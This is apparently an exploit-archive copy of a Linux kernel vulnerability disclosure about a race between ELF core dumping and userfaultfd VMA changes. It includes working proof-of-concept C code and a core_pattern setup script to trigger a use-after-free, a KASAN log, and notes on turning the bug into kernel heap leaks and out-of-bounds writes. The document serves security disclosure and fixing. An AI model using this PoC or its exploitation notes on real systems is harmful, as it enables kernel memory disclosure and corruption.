Linux missing locking between elf coredump code and userfaultfd vma modification Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2019-04-30 | Type: dos | Platform: linux
[+] Code ...
elf_core_dump() has a comment, dating back to something like 2.5.43-C3, that says:
/*
* We no longer stop all VM operations.
*
* This is because those proceses that could possibly change map_count
* or the mmap / vma pages are now blocked in do_exit on current
* finishing this core dump.
*
* Only ptrace can touch these memory addresses, but it doesn't change
* the map_count or the pages allocated. So no possibility of crashing
* exists while dumping the mm->vm_next areas to the core file.
*/
However, since commit 86039bd3b4e6 ("userfaultfd: add new syscall to provide
memory externalization", introduced in v4.3), that's no longer true; the
following functions can call vma_merge() on another task's VMAs while holding
the corresponding mmap_sem for writing:
- userfaultfd_release() [->release handler]
- userfaultfd_register() [invoked via ->unlocked_ioctl handler]
- userfaultfd_unregister() [invoked via ->unlocked_ioctl handler]
This means that VMAs can disappear from under elf_core_dump().
I see two potential ways to fix this, but I'm not sure whether either of them is
good:
1. Let elf_core_dump() hold a read lock on the mmap_sem across the page-dumping
loop. This would mean that the mmap_sem can be blocked indefinitely by a
userspace process, and e.g. userfaultfd_release() could block the task or
global workqueue it's running on (depending on where the final fput()
happened) indefinitely, which seems potentially bad from a denial-of-service
perspective?
2. Let coredump_wait() set a flag on the mm_struct before dropping the mmap_sem
that says "this mm_struct is going away, keep your hands off";
let the userfaultfd ioctl handlers check for the flag and bail out as if the
mm_struct was already dead;
hack userfaultfd_release() so that it only calls vma_merge() if the flag
hasn't been set;
and because I feel icky about concurrent reads and writes of bitmasks without
explicit annotations, either make the vm_flags accesses in
userfaultfd_release() and in everything called from elf_core_dump() atomic
(because userfaultfd_release will clear bits in them concurrently with reads
from elf_core_dump()) or let elf_core_dump() take the mmap_sem for reading
while looking at vm_flags.
If the fix goes in this direction, it should probably come with a big warning
on top of the definition of mmap_sem, or something like that.
user@debian:~/uffd_coredump$ cat coredump_helper.c
#include <err.h>
#include <stdbool.h>
#include <stddef.h>
#include <unistd.h>
int main(void) {
  char buf[1024];
  size_t total = 0;
  bool slept = false;
  while (1) {
    // read core dump data from stdin (the kernel's core_pattern pipe)
    int res = read(0, buf, sizeof(buf));
    if (res == -1) err(1, "read");
    if (res == 0) return 0;
    total += res;
    // after ~1 MiB, stall for 10 seconds to widen the race window
    if (total > 1024*1024 && !slept) {
      sleep(10);
      slept = true;
    }
  }
}
user@debian:~/uffd_coredump$ gcc -o coredump_helper coredump_helper.c
user@debian:~/uffd_coredump$ cat set_helper.sh
#!/bin/sh
echo "|$(realpath ./coredump_helper)" > /proc/sys/kernel/core_pattern
user@debian:~/uffd_coredump$ sudo ./set_helper.sh
user@debian:~/uffd_coredump$ cat dumpme.c
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
int main(void) {
  // set up an area consisting of half normal anon memory, half present userfaultfd region
  void *area = mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  if (area == MAP_FAILED) err(1, "mmap");
  memset(area, 'A', 1024*1024*2);
  int uffd = syscall(__NR_userfaultfd, 0);
  if (uffd == -1) err(1, "userfaultfd");
  struct uffdio_api api = { .api = 0xAA, .features = 0 };
  if (ioctl(uffd, UFFDIO_API, &api)) err(1, "API");
  struct uffdio_register reg = {
    .range = { .start = (unsigned long)area+1024*1024, .len = 1024*1024 },
    .mode = UFFDIO_REGISTER_MODE_MISSING
  };
  if (ioctl(uffd, UFFDIO_REGISTER, &reg)) err(1, "REGISTER");
  // spawn a child that can do stuff with the userfaultfd
  pid_t child = fork();
  if (child == -1) err(1, "fork");
  if (child == 0) {
    sleep(3);
    if (ioctl(uffd, UFFDIO_UNREGISTER, &reg.range)) err(1, "UNREGISTER");
    exit(0);
  }
  // parent: trigger a core dump so that elf_core_dump() (stalled in the
  // helper) races with the child's UNREGISTER; the rest of the original
  // file is truncated here, but abort() is one way to force the dump
  abort();
}
Kernel log after triggering the race (KASAN use-after-free report, excerpt):
[ 139.072235] The buggy address belongs to the object at ffff8881e616ed50
which belongs to the cache vm_area_struct of size 200
[ 139.075075] The buggy address is located 16 bytes inside of
200-byte region [ffff8881e616ed50, ffff8881e616ee18)
[ 139.077556] The buggy address belongs to the page:
[ 139.078648] page:ffffea0007985b00 count:1 mapcount:0 mapping:ffff8881eada6f00 index:0x0 compound_mapcount: 0
[ 139.080745] flags: 0x17fffc000010200(slab|head)
[ 139.081724] raw: 017fffc000010200 ffffea000792dc08 ffffea0007765c08 ffff8881eada6f00
[ 139.083477] raw: 0000000000000000 00000000001d001d 00000001ffffffff 0000000000000000
[ 139.085121] page dumped because: kasan: bad access detected
[ 139.086667] Memory state around the buggy address:
[ 139.087695] ffff8881e616ec00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.089294] ffff8881e616ec80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.090833] >ffff8881e616ed00: fc fc fc fc fc fc fc fc fc fc fb fb fb fb fb fb
[ 139.092417] ^
[ 139.093780] ffff8881e616ed80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 139.095318] ffff8881e616ee00: fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.096917] ==================================================================
[ 139.098460] Disabling lock debugging due to kernel taint
======================================================================
One thing that makes exploitation nice here is that concurrent modification of the number of VMAs throws off the use of the heap-allocated array `vma_filesz`:
- first, vma_filesz is allocated with a size based on the number of VMAs;
- then it is filled by iterating over the VMAs and writing their calculated sizes into the array, without re-checking against the array's size;
- then the function iterates over the VMAs again and dumps the entries in vma_filesz to userspace, again without checking whether the array bounds were exceeded.
This means that you can use this to:
- leak in-bounds uninitialized values
- leak out-of-bounds data
- write out-of-bounds data (with constraints on what can be written)
By using FUSE as the source of file mappings and as the coredump target (assuming that the system has the upstream default core_pattern), you can pause both the loop that performs out-of-bounds writes and the loop that performs out-of-bounds reads, so you should be able to abuse this to write into the middle of newly allocated objects if you want to.
The attached proof-of-concept just demonstrates how you can use this to leak kernel heap data because I didn't want to spend too much time on building a PoC for this.